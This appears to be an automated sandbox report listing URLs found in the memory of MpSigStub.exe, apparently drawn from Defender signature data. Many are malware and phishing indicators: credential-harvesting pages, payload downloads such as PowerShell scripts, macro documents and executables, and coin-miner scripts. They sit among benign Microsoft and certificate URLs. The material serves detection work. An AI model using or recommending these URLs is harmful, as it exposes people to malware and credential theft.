Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/yyaum/svchost.sh
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://trinitas.or.id/templates/jakarta/images/addons/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.cc/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.club/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.com/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.link/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.me/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.ru/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://tubestore.com.br/wp-content/p_bn/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://u.lewd.se/
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/e6b2i
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/edc63
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://u6882561.ct.sendgrid.net/wf/click?upn=o3yy7nxymwp5cpvqnxo3xb8sbgrdkj8vj
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://u6947877.ct.sendgrid.net/wf/click?upn=aum5tbbw0s-2boddc9wvl76ffmwkftnihk7jwmiyskchpxyq1lorjb
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://uaeub.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://ufile.io/xjsrzal2
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://uis.public360online.com:443/biz/v2-pbr/docprod/templates/_uis%20moteinnkalling_referat.docx
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://uniquestyle.dk/wp-content/themes/ifeaturepro5-child/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://updatesdomainn.ml/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://updatesdomainn.ml/post.php
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://upload.cat/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://uploadvirus.com/uploads/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://upt.fastsearch.me/
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://upurl.me/m7oiv
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://upurl.me/vvkzd
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: https://urldefense.proofpoint.com/v2/url?u=http-3a__entreverodomoha.com.br_7_index.php-3f-3f-3fr-3fw
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://utilities.pcpitstop.com
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://vamoss.com.br/blogfolio/wp-content/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://vaqww.dyndns.dk/tolly5/
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://vespang.cf/aggreey/post.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://victoriaparkmazda-my.sharepoint.com/personal/ann_victoriaparkmazda_co_uk/_layouts/15/guestac
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: https://vieeewen.org/ddy/next.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: https://vieeewen.org/tgg/next.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://viro.mleydier.fr/noauth
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://vm.jt-voicem.club/?e=ckoonce
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://vm.jt-voicem.club/?e=ljeffcoat
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://vmnames.ssvoipsx.xyz/?e=%25
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://vmnapi.net/vmap/1.0/yhs/ms/yhs/?vmimp=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://vn.pr-nijim.xyz/?e=soumu
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://voice.vm-business.online/?e=jscott
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://voicemailss.hozoimn.xyz/?e=twfyawx5bi5kywvja2vslw1peebnyxjhdghvbkvszwn0cmljlmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://voipses.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://voipss.snonames.xyz/?e=%25
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://vooydvclhlqukhdvrsxe.com/tx.dll
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://voyya.com.mx/wp-content/themes/Divi/incl(
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://vp.videomeet.club/?e=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://vr2oq.csb.app/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/4a8gk
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/ghqec
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/xndcx
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: https://vtsamples.commondatastorage.googleapis.com/
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gcbs
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gccs
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://wacochamber.com/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://we.tl/t-ccUfUrQOhF
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://webmailx.space/ml/ama/4/excel/log.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://ws.onehub.com/files/7w1372el
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://www-cdn.getwebcake.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.%s.com.br/
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%xc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/web/directdownload/plcok719ce/hhnjnm.d9cc6b8210cf7f938818851
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.admos-gleitlager.de/feed/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.advokathuset.dk/auktioner/tvangsauktioner/saadan-koeber-du-paa-tvangsauktion
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.aec.com.my/aec_5.5/public/ph/h/page.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.anca-aste.it/uploads/form/boeing_spe_leos_logo.jpg
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://www.anthonyshandyman.com/irn/toolzlord.php
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/appleca/0
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.arm-mn.com/wp-content/themes/bb-theme/classes/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.astedams.it/uploads/frame/61.dotm
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.astedams.it/uploads/template/17.dotm
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.augenta.com/site/xmlrpc.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.autopfand24.de/pfandhaus-in-meiner-naehe/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.bancanetempresarial.banamex
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/ad
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/bug41
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.bizsonet.com/wp-admin/js/jquery
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.botanicinnovations.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.brawnmediany.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.cactusthebrand.com/xmlrpc.php
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://www.ccleaner.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://www.cipnet.cl/wp-content/godd/godaddy-rd18/next.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.coastalbridgeadvisors.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://www.cogmobile.com/next1.php
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://www.coinblind.com/lib/coinblind_beta.js
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.creamery201.com/
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.dfib.net/calc.exe
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.divera.nl/wp-content/themes/flexfit/framework/css/font/gr
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/alu/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/bigi/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/pa/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.domkara.com.au/fonts/font-awesome/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.domkara.com.au/revolution/css/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/dmprbq9mxwylpht/zs437zfig68f.doc?dl=1
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/foughx315flj51u/worddata.dotm?dl=1
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/r9xrl3meju6lr19/payment_advice.uue?dl=1)
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/accountinfo.asp
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/ai.asp?c=AS
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/verify.asp
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/verify.asp&BAction=
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/aa/excel.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/bb/excel.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/cc/excel.php
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: https://www.elcom.admin.ch
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.emergencydentistlondonpro.co.uk/hddu2vgb7muait.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.escrowprotects.com/share
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://www.exploit-db.com/exploits/39719/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fabianiarte.com/uploads/imgup/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: https://www.fastsupport.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fastsupport.com/
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://www.finance-portal.basf.net/portal
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.fotoideaymedia.es/wp-content/themes/fotoideaymedia2017/css/reset.css
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://www.freecontent.bid./cpcu.js
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.giftsack.co.uk/wp-includes/pomo/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.globalp.com.br/wp-includes/fonts/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/j/collect.
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com.tr/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://www.gottalife.net/wp-content/plugins/seo_index/evt8tkbsidbqf.php
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.gqtoronto.com/live/excelzz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://www.gynfit2019.com.br/fotos.jpg
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hashing.win/scripts/min.js
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.hashing.win/t5s0.js
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.horizon-sun.com/po/mailbox/rectify/sys-admin-9-0-4-7/repair-00-4/1159.php
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://www.icq.com/people/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://www.ijsiodjfo.ml/index.php?user=
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.listrikindo.com/templates/vinye/wp-content/themes/jamo/order1.doc
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://www.llotytue.gq/index.php?user=
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.luongynhiem.com/wp-content/themes/sahifa/js/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://www.maan2u.com/alls.txt
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: https://www.managuytakayama.com/purchases
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.marriott.com
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://www.monconcept-renovation.fr/wp-admin/network/msci.exe
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.moverandpackermvp.com/hindustan/scan/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.nachhilfe-unterricht.com/wp-content/cache/autoptimize/css/autoptimize_018281502668e27604
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://www.ne-ba.org/files/gallery/images/bae_ecs_epm.jpg
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.nextrecruitment.ro//pdd/sfexpress/index.php?email=hiroyuki.ume.zh
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://www.notion.so/ce3baa2cd5ec4f4eab00575f5ae423e8
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://www.objectiveline.com/tt-onedrive/sugar.php
